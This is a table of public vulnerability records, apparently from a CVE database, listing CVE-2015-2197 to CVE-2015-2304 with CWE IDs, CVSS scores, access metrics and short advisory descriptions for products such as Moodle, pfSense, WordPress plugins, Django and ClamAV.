# |
CVE ID
|
CWE ID
|
# of Exploits
|
Vulnerability Type(s)
|
Publish Date
|
Update Date
|
Score
|
Gained Access Level
|
Access
|
Complexity
|
Authentication
|
Conf.
|
Integ.
|
Avail.
|
36651 |
CVE-2015-2304 |
22 |
|
Dir. Trav. |
2015-03-15 |
2018-10-30 |
6.4 |
None |
Remote |
Low |
Not required |
None |
Partial |
Partial |
Absolute path traversal vulnerability in bsdcpio in libarchive 3.1.2 and earlier allows remote attackers to write to arbitrary files via a full pathname in an archive. |
36652 |
CVE-2015-2298 |
200 |
|
+Info |
2018-01-12 |
2018-01-29 |
5.0 |
None |
Remote |
Low |
Not required |
Partial |
None |
None |
node/utils/ExportEtherpad.js in Etherpad 1.5.x before 1.5.2 might allow remote attackers to obtain sensitive information by leveraging an improper substring check when exporting a padID. |
36653 |
CVE-2015-2297 |
476 |
|
DoS |
2017-10-06 |
2017-10-13 |
5.0 |
None |
Remote |
Low |
Not required |
None |
None |
Partial |
nanohttp in libcsoap allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted Authorization header. |
36654 |
CVE-2015-2296 |
|
|
|
2015-03-18 |
2016-07-15 |
6.8 |
None |
Remote |
Medium |
Not required |
Partial |
Partial |
Partial |
The resolve_redirects function in sessions.py in requests 2.1.0 through 2.5.3 allows remote attackers to conduct session fixation attacks via a cookie without a host value in a redirect. |
36655 |
CVE-2015-2295 |
352 |
|
CSRF |
2015-04-10 |
2019-05-30 |
6.8 |
None |
Remote |
Medium |
Not required |
Partial |
Partial |
Partial |
Cross-site request forgery (CSRF) vulnerability in system_firmware_restorefullbackup.php in the WebGUI in pfSense before 2.2.1 allows remote attackers to hijack the authentication of administrators for requests that delete arbitrary files via the deletefile parameter. |
36656 |
CVE-2015-2294 |
79 |
|
XSS |
2015-04-01 |
2019-05-30 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
Multiple cross-site scripting (XSS) vulnerabilities in the WebGUI in pfSense before 2.2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) zone parameter to status_captiveportal.php; (2) if or (3) dragtable parameter to firewall_rules.php; (4) queue parameter in an add action to firewall_shaper.php; (5) id parameter in an edit action to services_unbound_acls.php; or (6) filterlogentries_time, (7) filterlogentries_sourceipaddress, (8) filterlogentries_sourceport, (9) filterlogentries_destinationipaddress, (10) filterlogentries_interfaces, (11) filterlogentries_destinationport, (12) filterlogentries_protocolflags, or (13) filterlogentries_qty parameter to diag_logs_filter.php. |
36657 |
CVE-2015-2293 |
352 |
|
Sql CSRF |
2015-03-17 |
2015-03-18 |
6.8 |
None |
Remote |
Medium |
Not required |
Partial |
Partial |
Partial |
Multiple cross-site request forgery (CSRF) vulnerabilities in admin/class-bulk-editor-list-table.php in the WordPress SEO by Yoast plugin before 1.5.7, 1.6.x before 1.6.4, and 1.7.x before 1.7.4 for WordPress allow remote attackers to hijack the authentication of certain users for requests that conduct SQL injection attacks via the (1) order_by or (2) order parameter in the wpseo_bulk-editor page. |
36658 |
CVE-2015-2292 |
89 |
|
Exec Code Sql CSRF |
2015-03-17 |
2016-12-02 |
6.5 |
None |
Remote |
Low |
Single system |
Partial |
Partial |
Partial |
Multiple SQL injection vulnerabilities in admin/class-bulk-editor-list-table.php in the WordPress SEO by Yoast plugin before 1.5.7, 1.6.x before 1.6.4, and 1.7.x before 1.7.4 for WordPress allow remote authenticated users to execute arbitrary SQL commands via the (1) order_by or (2) order parameter in the wpseo_bulk-editor page to wp-admin/admin.php. NOTE: this can be leveraged using CSRF to allow remote attackers to execute arbitrary SQL commands. |
36659 |
CVE-2015-2289 |
79 |
|
XSS |
2015-03-23 |
2018-10-09 |
3.5 |
None |
Remote |
Medium |
Single system |
None |
Partial |
None |
Cross-site scripting (XSS) vulnerability in templates/2k11/admin/entries.tpl in Serendipity before 2.0.1 allows remote authenticated editors to inject arbitrary web script or HTML via the serendipity[cat][name] parameter to serendipity_admin.php, when creating a new category. |
36660 |
CVE-2015-2286 |
200 |
|
+Info |
2016-03-19 |
2016-03-22 |
4.3 |
None |
Remote |
Medium |
Not required |
Partial |
None |
None |
lms/templates/footer-edx-new.html in Open edX edx-platform before 2015-01-29 does not properly restrict links on the password-reset page, which allows user-assisted remote attackers to discover password-reset tokens by reading a referer log after a victim navigates from this page to a social-sharing site. |
36661 |
CVE-2015-2278 |
119 |
|
DoS Overflow |
2015-06-02 |
2018-10-09 |
5.0 |
None |
Remote |
Low |
Not required |
None |
None |
Partial |
The LZH decompression implementation (CsObjectInt::BuildHufTree function in vpa108csulzh.cpp) in SAP MaxDB 7.5 and 7.6, Netweaver Application Server ABAP, Netweaver Application Server Java, Netweaver RFC SDK, GUI, RFC SDK, SAPCAR archive tool, and other products allows context-dependent attackers to cause a denial of service (out-of-bounds read) via unspecified vectors, related to look-ups of non-simple codes, aka SAP Security Note 2124806, 2121661, 2127995, and 2125316. |
36662 |
CVE-2015-2275 |
79 |
1
|
XSS |
2015-03-12 |
2018-10-09 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
Cross-site scripting (XSS) vulnerability in WoltLab Community Gallery 2.0 before 2014-12-26 allows remote attackers to inject arbitrary web script or HTML via the parameters[data][7][title] parameter in a saveImageData action to index.php/AJAXProxy. |
36663 |
CVE-2015-2273 |
79 |
|
XSS |
2015-06-01 |
2015-06-02 |
3.5 |
None |
Remote |
Medium |
Single system |
None |
Partial |
None |
Cross-site scripting (XSS) vulnerability in mod/quiz/report/statistics/statistics_question_table.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allows remote authenticated users to inject arbitrary web script or HTML by leveraging the student role for a crafted quiz response. |
36664 |
CVE-2015-2272 |
264 |
|
Bypass |
2015-06-01 |
2017-03-23 |
4.0 |
None |
Remote |
Low |
Single system |
None |
Partial |
None |
login/token.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allows remote authenticated users to bypass a forced-password-change requirement by creating a web-services token. |
36665 |
CVE-2015-2271 |
264 |
|
Bypass |
2015-06-01 |
2015-06-02 |
4.0 |
None |
Remote |
Low |
Single system |
None |
Partial |
None |
tag/user.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 does not consider the moodle/tag:flag capability before proceeding with a flaginappropriate action, which allows remote authenticated users to bypass intended access restrictions via the "Flag as inappropriate" feature. |
36666 |
CVE-2015-2270 |
17 |
|
+Info |
2015-06-01 |
2015-06-02 |
4.3 |
None |
Remote |
Medium |
Not required |
Partial |
None |
None |
lib/moodlelib.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4, when the theme uses the blocks-regions feature, establishes the course state at an incorrect point in the login-validation process, which allows remote attackers to obtain sensitive course information via unspecified vectors. |
36667 |
CVE-2015-2269 |
79 |
|
XSS |
2015-06-01 |
2015-06-02 |
3.5 |
None |
Remote |
Medium |
Single system |
None |
Partial |
None |
Multiple cross-site scripting (XSS) vulnerabilities in lib/javascript-static.js in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allow remote authenticated users to inject arbitrary web script or HTML via a (1) alt or (2) title attribute in an IMG element. |
36668 |
CVE-2015-2268 |
399 |
|
DoS |
2015-06-01 |
2015-06-02 |
6.8 |
None |
Remote |
Low |
Single system |
None |
None |
Complete |
filter/urltolink/filter.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allows remote authenticated users to cause a denial of service (CPU consumption or partial outage) via a crafted string that is matched against an improper regular expression. |
36669 |
CVE-2015-2267 |
284 |
|
Bypass |
2015-06-01 |
2015-06-02 |
4.0 |
None |
Remote |
Low |
Single system |
None |
Partial |
None |
mdeploy.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allows remote authenticated users to bypass intended access restrictions and extract archives to arbitrary directories via a crafted dataroot value. |
36670 |
CVE-2015-2266 |
200 |
|
+Info |
2015-06-01 |
2015-06-02 |
4.0 |
None |
Remote |
Low |
Single system |
Partial |
None |
None |
message/index.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 does not consider the moodle/site:readallmessages capability before accessing arbitrary conversations, which allows remote authenticated users to obtain sensitive personal-contact and unread-message-count information via a modified URL. |
36671 |
CVE-2015-2264 |
|
|
+Priv |
2015-03-12 |
2015-03-13 |
6.9 |
None |
Local |
Medium |
Not required |
Complete |
Complete |
Complete |
Multiple untrusted search path vulnerabilities in (1) EQATEC.Analytics.Monitor.Win32_vc100.dll and (2) EQATEC.Analytics.Monitor.Win32_vc100-x64.dll in Telerik Analytics Monitor Library before 3.2.125 allow local users to gain privileges via a Trojan horse (a) csunsapi.dll, (b) swift.dll, (c) nfhwcrhk.dll, or (d) surewarehook.dll file in an unspecified directory. |
36672 |
CVE-2015-2263 |
264 |
|
+Info |
2017-03-23 |
2017-03-29 |
2.1 |
None |
Local |
Low |
Not required |
Partial |
None |
None |
Cloudera Manager 4.x, 5.0.x before 5.0.6, 5.1.x before 5.1.5, 5.2.x before 5.2.5, and 5.3.x before 5.3.3 uses global read permissions for files in its configuration directory when starting YARN NodeManager, which allows local users to obtain sensitive information by reading the files, as demonstrated by yarn.keytab or ssl-server.xml in /var/run/cloudera-scm-agent/process. |
36673 |
CVE-2015-2255 |
19 |
|
DoS |
2017-06-08 |
2017-06-16 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
None |
Partial |
Huawei AR1220 routers with software before V200R005SPH006 allow remote attackers to cause a denial of service (board reset) via vectors involving a large amount of traffic from the GE port to the FE port. |
36674 |
CVE-2015-2253 |
200 |
|
+Info |
2017-06-08 |
2017-06-20 |
3.5 |
None |
Remote |
Medium |
Single system |
Partial |
None |
None |
The XML interface in Huawei OceanStor UDS devices with software before V100R002C01SPC102 allows remote authenticated users to obtain sensitive information via a crafted XML document. |
36675 |
CVE-2015-2251 |
200 |
|
+Info |
2017-06-08 |
2017-06-20 |
5.0 |
None |
Remote |
Low |
Not required |
Partial |
None |
None |
The DeviceManager in Huawei OceanStor UDS devices with software before V100R002C01SPC102 might allow remote attackers to obtain sensitive information via a crafted UDS patch with JavaScript. |
36676 |
CVE-2015-2250 |
79 |
|
XSS |
2015-05-15 |
2018-10-09 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
Multiple cross-site scripting (XSS) vulnerabilities in concrete5 before 5.7.4 allow remote attackers to inject arbitrary web script or HTML via the (1) banned_word[] parameter to index.php/dashboard/system/conversations/bannedwords/success, (2) channel parameter to index.php/dashboard/reports/logs/view, (3) accessType parameter to index.php/tools/required/permissions/access_entity, (4) msCountry parameter to index.php/dashboard/system/multilingual/setup/load_icon, arHandle parameter to (5) design/submit or (6) design in index.php/ccm/system/dialogs/area/design/submit, (7) pageURL to index.php/dashboard/pages/single, (8) SEARCH_INDEX_AREA_METHOD parameter to index.php/dashboard/system/seo/searchindex/updated, (9) unit parameter to index.php/dashboard/system/optimization/jobs/job_scheduled, (10) register_notification_email parameter to index.php/dashboard/system/registration/open/1, or (11) PATH_INFO to index.php/dashboard/extend/connect/. |
36677 |
CVE-2015-2248 |
352 |
|
CSRF |
2015-05-01 |
2018-03-12 |
6.8 |
None |
Remote |
Medium |
Not required |
Partial |
Partial |
Partial |
Cross-site request forgery (CSRF) vulnerability in the user portal in Dell SonicWALL Secure Remote Access (SRA) products with firmware before 7.5.1.0-38sv and 8.x before 8.0.0.1-16sv allows remote attackers to hijack the authentication of users for requests that create bookmarks via a crafted request to cgi-bin/editBookmark. |
36678 |
CVE-2015-2246 |
200 |
|
+Info |
2017-04-02 |
2017-04-07 |
4.3 |
None |
Remote |
Medium |
Not required |
Partial |
None |
None |
The MeWidget module on Huawei P7 smartphones with software P7-L10 V100R001C00B136 and earlier versions could lead to the disclosure of contact information. |
36679 |
CVE-2015-2245 |
20 |
|
DoS |
2017-06-27 |
2017-07-03 |
5.0 |
None |
Remote |
Low |
Not required |
None |
None |
Partial |
Huawei Ascend P7 allows remote attackers to cause a denial of service (phone process crash). |
36680 |
CVE-2015-2244 |
79 |
|
XSS |
2015-03-09 |
2015-03-10 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
Multiple cross-site scripting (XSS) vulnerabilities in Webshop hun 1.062S allow remote attackers to inject arbitrary web script or HTML via the (1) param, (2) center, (3) lap, (4) termid, or (5) nyelv_id parameter to index.php. |
36681 |
CVE-2015-2241 |
79 |
|
XSS |
2015-03-12 |
2016-12-02 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
Cross-site scripting (XSS) vulnerability in the contents function in admin/helpers.py in Django before 1.7.6 and 1.8 before 1.8b2 allows remote attackers to inject arbitrary web script or HTML via a model attribute in ModelAdmin.readonly_fields, as demonstrated by a @property. |
36682 |
CVE-2015-2239 |
19 |
|
XSS |
2015-03-08 |
2016-12-02 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
Google Chrome before 41.0.2272.76, when Instant Extended mode is used, does not properly consider the interaction between the "1993 search" features and restore-from-disk RELOAD transitions, which makes it easier for remote attackers to spoof the address bar for a search-results page by leveraging (1) a compromised search engine or (2) an XSS vulnerability in a search engine, a different vulnerability than CVE-2015-1231. |
36683 |
CVE-2015-2235 |
310 |
|
|
2015-03-06 |
2015-03-09 |
5.0 |
None |
Remote |
Low |
Not required |
None |
Partial |
None |
Secure Transport in Apple iOS through 8.1.3, Apple OS X through 10.10.2, and Apple TV through 7.0.3 does not properly restrict TLS state transitions, which makes it easier for remote attackers to conduct cipher-downgrade attacks to EXPORT_RSA ciphers via crafted TLS traffic, related to the "FREAK" issue, a different vulnerability than CVE-2015-0204 and CVE-2015-1637. |
36684 |
CVE-2015-2234 |
362 |
|
+Priv |
2015-05-12 |
2017-01-02 |
6.9 |
None |
Local |
Medium |
Not required |
Complete |
Complete |
Complete |
Race condition in Lenovo System Update (formerly ThinkVantage System Update) before 5.06.0034 uses world-writable permissions for the update files directory, which allows local users to gain privileges by writing to an update file after the signature is validated. |
36685 |
CVE-2015-2230 |
79 |
|
XSS |
2019-05-30 |
2019-05-31 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
Synacor Zimbra Collaboration Server 8.x before 8.7.0 has Reflected XSS in admin console. |
36686 |
CVE-2015-2223 |
79 |
|
XSS |
2015-04-14 |
2018-10-09 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
Multiple cross-site scripting (XSS) vulnerabilities in the web-based console management interface in Palo Alto Networks Traps (formerly Cyvera Endpoint Protection) 3.1.2.1546 allow remote attackers to inject arbitrary web script or HTML via the (1) Arguments, (2) FileName, or (3) URL parameter in a SOAP request. |
36687 |
CVE-2015-2222 |
399 |
|
DoS |
2015-05-12 |
2017-01-02 |
5.0 |
None |
Remote |
Low |
Not required |
None |
None |
Partial |
ClamAV before 0.98.7 allows remote attackers to cause a denial of service (crash) via a crafted petite packed file. |
36688 |
CVE-2015-2221 |
399 |
|
DoS |
2015-05-12 |
2017-01-02 |
5.0 |
None |
Remote |
Low |
Not required |
None |
None |
Partial |
ClamAV before 0.98.7 allows remote attackers to cause a denial of service (infinite loop) via a crafted y0da cryptor file. |
36689 |
CVE-2015-2220 |
79 |
|
XSS |
2015-03-05 |
2018-10-09 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
Multiple cross-site scripting (XSS) vulnerabilities in the Ninja Forms plugin before 2.8.9 for WordPress allow (1) remote attackers to inject arbitrary web script or HTML via the ninja_forms_field_1 parameter in a ninja_forms_ajax_submit action to wp-admin/admin-ajax.php or (2) remote administrators to inject arbitrary web script or HTML via the fields[1] parameter to wp-admin/post.php. |
36690 |
CVE-2015-2218 |
79 |
1
|
XSS |
2015-03-05 |
2016-12-02 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
Multiple cross-site scripting (XSS) vulnerabilities in the wp_ajax_save_item function in wonderpluginaudio.php in the WonderPlugin Audio Player plugin before 2.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) item[name] or (2) item[customcss] parameter in a wonderplugin_audio_save_item action to wp-admin/admin-ajax.php or the itemid parameter in the (3) wonderplugin_audio_show_item or (4) wonderplugin_audio_edit_item page to wp-admin/admin.php. |
36691 |
CVE-2015-2217 |
79 |
|
XSS |
2015-03-10 |
2018-10-09 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
Multiple cross-site scripting (XSS) vulnerabilities in Ultimate PHP Board (aka myUPB) before 2.2.8 allow remote attackers to inject arbitrary web script or HTML via the (1) q parameter to search.php or (2) avatar parameter to profile.php. |
36692 |
CVE-2015-2215 |
|
|
|
2015-03-05 |
2015-03-05 |
5.8 |
None |
Remote |
Medium |
Not required |
Partial |
Partial |
None |
Open redirect vulnerability in the Services single sign-on server helper (services_sso_server_helper) module for Drupal allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified parameters. |
36693 |
CVE-2015-2214 |
200 |
|
+Info |
2015-03-05 |
2016-12-02 |
5.0 |
None |
Remote |
Low |
Not required |
Partial |
None |
None |
NetCat 5.01 and earlier allows remote attackers to obtain the installation path via the redirect_url parameter to netshop/post.php. |
36694 |
CVE-2015-2209 |
200 |
|
+Info |
2015-03-04 |
2016-12-02 |
5.0 |
None |
Remote |
Low |
Not required |
Partial |
None |
None |
DLGuard 4.5 allows remote attackers to obtain the installation path via the c parameter to index.php. |
36695 |
CVE-2015-2206 |
200 |
|
+Info CSRF |
2015-03-09 |
2016-12-27 |
5.0 |
None |
Remote |
Low |
Not required |
Partial |
None |
None |
libraries/select_lang.lib.php in phpMyAdmin 4.0.x before 4.0.10.9, 4.2.x before 4.2.13.2, and 4.3.x before 4.3.11.1 includes invalid language values in unknown-language error responses that contain a CSRF token and may be sent with HTTP compression, which makes it easier for remote attackers to conduct a BREACH attack and determine this token via a series of crafted requests. |
36696 |
CVE-2015-2204 |
200 |
|
Bypass +Info |
2018-02-01 |
2018-02-15 |
5.0 |
None |
Remote |
Low |
Not required |
Partial |
None |
None |
Evergreen before 2.5.9, 2.6.x before 2.6.7, and 2.7.x before 2.7.4 allows remote attackers to bypass an intended access restriction and obtain sensitive information about org unit settings by leveraging failure of open-ils.actor.ou_setting.ancestor_default to enforce view_perm when no auth token is provided. |
36697 |
CVE-2015-2203 |
200 |
|
+Info |
2018-02-01 |
2018-02-15 |
4.0 |
None |
Remote |
Low |
Single system |
Partial |
None |
None |
Evergreen 2.5.9, 2.6.7, and 2.7.4 allows remote authenticated users with STAFF_LOGIN permission to obtain sensitive settings history information by leveraging listing of open-ils.pcrud as a controller in the IDL. |
36698 |
CVE-2015-2199 |
89 |
1
|
Exec Code Sql |
2015-03-03 |
2015-03-04 |
6.5 |
None |
Remote |
Low |
Single system |
Partial |
Partial |
Partial |
Multiple SQL injection vulnerabilities in the WonderPlugin Audio Player plugin before 2.1 for WordPress allow (1) remote authenticated users to execute arbitrary SQL commands via the item[id] parameter in a wonderplugin_audio_save_item action to wp-admin/admin-ajax.php or remote administrators to execute arbitrary SQL commands via the itemid parameter in the (2) wonderplugin_audio_show_item, (3) wonderplugin_audio_show_items, or (4) wonderplugin_audio_edit_item page to wp-admin/admin.php. |
36699 |
CVE-2015-2198 |
79 |
1
|
XSS |
2015-03-03 |
2015-03-04 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
Multiple cross-site scripting (XSS) vulnerabilities in edit_prefs.php in Beehive Forum 1.4.4 allow remote attackers to inject arbitrary web script or HTML via the (1) homepage_url, (2) pic_url, or (3) avatar_url parameter, which are not properly handled in an error message. |
36700 |
CVE-2015-2197 |
79 |
|
XSS |
2015-03-03 |
2015-03-04 |
3.5 |
None |
Remote |
Medium |
Single system |
None |
Partial |
None |
Cross-site scripting (XSS) vulnerability in the Entity API module before 7.x-1.6 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via a field label in the Token API. |